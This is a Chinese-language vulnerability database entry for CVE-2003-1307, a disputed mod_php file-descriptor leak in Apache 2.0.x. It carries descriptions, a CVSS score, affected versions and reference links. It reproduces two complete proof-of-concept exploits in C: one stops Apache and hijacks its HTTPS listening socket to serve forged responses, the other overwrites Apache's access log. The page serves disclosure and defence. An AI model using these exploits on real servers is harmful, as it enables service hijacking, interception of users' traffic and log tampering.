CVE-2003-1307
CVSS4.3
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:35
NMCOE    

[原文]** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."


[CNNVD]Apache mod_php模块文件描述符本地泄露漏洞(CNNVD-200312-435)

        
        Apache是一款流行的WEB服务程序。
        Apache mod_php存在一个安全问题,本地攻击者可以利用这个漏洞访问权限高的文件描述符,这可导致窃取和修改敏感信息。
        当使用mod_php时,许多文件描述符泄露给PHP脚本进程,如果脚本页面通过passthru()、exec()或system()调用外部程序,描述符就会写给这些程序。
        其中之一的描述符是监听描述符,监听443端口,也就是https,端口443是特权端口,一般由ROOT进程绑定。这个描述符由apache打开,而并不需要是否使用https。
        引起此漏洞主要是没有使用CLOEXEC标记的fcntl调用来防止特权文件描述符的泄露。利用这个问题,可能通过这些描述符窃取和修改Apache服务器端的敏感信息。
        

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:apache:http_server:2.0.46::win32
cpe:/a:apache:http_server:2.0.47Apache Software Foundation Apache HTTP Server 2.0.47
cpe:/a:apache:http_server:2.0.28Apache Software Foundation Apache HTTP Server 2.0.28
cpe:/a:apache:http_server:2.0.48Apache Software Foundation Apache HTTP Server 2.0.48
cpe:/a:apache:http_server:2.0.41Apache Software Foundation Apache HTTP Server 2.0.41
cpe:/a:apache:http_server:2.0.36Apache Software Foundation Apache HTTP Server 2.0.36
cpe:/a:apache:http_server:2.0.40Apache Software Foundation Apache HTTP Server 2.0.40
cpe:/a:apache:http_server:2.0.42Apache Software Foundation Apache HTTP Server 2.0.42
cpe:/a:apache:http_server:2.0.28:betaApache Software Foundation Apache HTTP Server 2.0.28 Beta
cpe:/a:apache:http_server:2.0.37Apache Software Foundation Apache HTTP Server 2.0.37
cpe:/a:apache:http_server:2.0.35Apache Software Foundation Apache HTTP Server 2.0.35
cpe:/a:apache:http_server:2.0.45Apache Software Foundation Apache HTTP Server 2.0.45
cpe:/a:apache:http_server:2.0.32:beta:win32
cpe:/a:apache:http_server:2.0.43Apache Software Foundation Apache HTTP Server 2.0.43
cpe:/a:apache:http_server:2.0.39Apache Software Foundation Apache HTTP Server 2.0.39
cpe:/a:apache:http_server:2.0.44Apache Software Foundation Apache HTTP Server 2.0.44
cpe:/a:apache:http_server:2.0.46Apache Software Foundation Apache HTTP Server 2.0.46
cpe:/a:apache:http_server:2.0.32Apache Software Foundation Apache HTTP Server 2.0.32
cpe:/a:apache:http_server:2.0.28:beta:win32
cpe:/a:apache:http_server:2.0Apache Software Foundation Apache HTTP Server 2.0
cpe:/a:apache:http_server:2.0.9Apache Software Foundation Apache HTTP Server 2.0.9a
cpe:/a:apache:http_server:2.0.34:beta:win32
cpe:/a:apache:http_server:2.0.38Apache Software Foundation Apache HTTP Server 2.0.38

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1307
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1307
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-435
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/9302
(UNKNOWN)  BID  9302
http://www.securityfocus.com/archive/1/archive/1/449298/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20061020 Re: PHP "exec", "system", "popen" (+small POC)
http://www.securityfocus.com/archive/1/archive/1/449234/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20061019 PHP "exec", "system", "popen" problem
http://www.securityfocus.com/archive/1/348368
(VENDOR_ADVISORY)  BUGTRAQ  20031226 Hijacking Apache https by mod_php
http://hackerdom.ru/~dimmo/phpexpl.c
(UNKNOWN)  MISC  http://hackerdom.ru/~dimmo/phpexpl.c
http://bugs.php.net/38915
(UNKNOWN)  MISC  http://bugs.php.net/38915

- 漏洞信息

Apache mod_php模块文件描述符本地泄露漏洞
中危 访问验证错误
2003-12-31 00:00:00 2006-10-24 00:00:00
本地  
        
        Apache是一款流行的WEB服务程序。
        Apache mod_php存在一个安全问题,本地攻击者可以利用这个漏洞访问权限高的文件描述符,这可导致窃取和修改敏感信息。
        当使用mod_php时,许多文件描述符泄露给PHP脚本进程,如果脚本页面通过passthru()、exec()或system()调用外部程序,描述符就会写给这些程序。
        其中之一的描述符是监听描述符,监听443端口,也就是https,端口443是特权端口,一般由ROOT进程绑定。这个描述符由apache打开,而并不需要是否使用https。
        引起此漏洞主要是没有使用CLOEXEC标记的fcntl调用来防止特权文件描述符的泄露。利用这个问题,可能通过这些描述符窃取和修改Apache服务器端的敏感信息。
        

- 公告与补丁

        厂商补丁:
        PHP
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.php.net

- 漏洞信息 (23481)

Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1) (EDBID:23481)
linux local
2003-12-26 Verified
0 Steve Grubb
N/A [点击下载]
source: http://www.securityfocus.com/bid/9302/info

Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information. 

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <openssl/ssl.h>

/*
 * The basic actions are like this:
 *      1) Become session leader
 *      2) Get rid of the parent (apache)
 *      3) Start handling requests
 */

#define LISTEN_DESCRIPTOR 4
#define CERTF "/var/www/html/foo-cert.pem"
#define KEYF  "/var/www/html/foo-cert.pem"

static SSL_CTX    *ctx;
static SSL        *ssl;
static X509       *client_cert;
static SSL_METHOD *meth;

static void server_loop(int descr);
static void ssl_init(void);

int main(int argc, char *argv[])
{
    /* Need to fork so apache doesn't kill us */
    if (fork() == 0) {
        /* Become session leader */
        setsid();
        sleep(2);

        /* just in case one was a controlling tty */
        close(0); close(1); close(2);
        ssl_init();
        server_loop(LISTEN_DESCRIPTOR);
    }
    else
    {
        sleep(1);
        system("/usr/sbin/httpd -k stop");
        sleep(1);
    }
    return 0;
}

static void server_loop(int descr)
{
    struct timeval   tv;
    fd_set read_mask ;

    FD_ZERO(&read_mask);
    FD_SET(descr, &read_mask);
    for (;;) {
        struct sockaddr_in remote;
        socklen_t len = sizeof(remote);
        int fd;

        if (select(descr+1, &read_mask, NULL, NULL, 0 ) == -1)
            continue;
        fd = accept(descr, &remote, &len);
        if (fd >=0) {
            char obuf[1024];
            if ((ssl = SSL_new (ctx)) != NULL) {
                SSL_set_fd (ssl, fd);
                SSL_set_accept_state(ssl);
                if ((SSL_accept (ssl)) == -1)
                        exit(1);

                strcpy(obuf, "HTTP/1.0 200 OK\n");
                strcat(obuf, "Content-Length: 40\n");
                strcat(obuf, "Content-Type: text/html\n\n");
                strcat(obuf, "<html><body>You're owned!</body></html>");
                SSL_write (ssl, obuf, strlen(obuf));
                SSL_set_shutdown(ssl,
                        SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
                SSL_free (ssl);
                ERR_remove_state(0);
            }
            close(fd);
        }
    }
    SSL_CTX_free (ctx);  /* Never gets called */
}

static void ssl_init(void)
{
        SSL_load_error_strings();
        SSLeay_add_ssl_algorithms();
        meth = SSLv23_server_method();
        ctx = SSL_CTX_new (meth);
        if (!ctx)
                exit(1);
        if (SSL_CTX_use_certificate_file(ctx, CERTF,
                        SSL_FILETYPE_PEM) <= 0)
                exit(1);
        if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
                        SSL_FILETYPE_PEM) <= 0)
                exit(1);
        if (!SSL_CTX_check_private_key(ctx))
                exit(1);
}

		

- 漏洞信息 (23482)

Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2) (EDBID:23482)
linux local
2003-12-26 Verified
0 frauk\x41ser
N/A [点击下载]
source: http://www.securityfocus.com/bid/9302/info
 
Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information.

# apache's access_log can be overwritten with arbitrary content
# from PHP called executables.
# POC by frauk\x41ser && sk0L / SEC Consult 2006

#include <unistd.h>
#include <fcntl.h>

#define LOGFD 7

void main(){
        fcntl(LOGFD, F_SETFL, O_WRONLY); // change mode from append to write
        lseek(LOGFD, 0, SEEK_SET); // reposition to start of file
        write(LOGFD,"hehe\n",5);
}

		

- 漏洞信息

3215
mod_php for Apache HTTP Server File Descriptor Leakage
Vendor Verified

- 漏洞描述

Apache mod_php contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker makes an SSL connection to the Apache server with permissions to execute file uploads, which will disclose file descriptor information resulting in possible hijacking of the HTTP service.

- 时间线

2003-12-26 2003-12-26
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站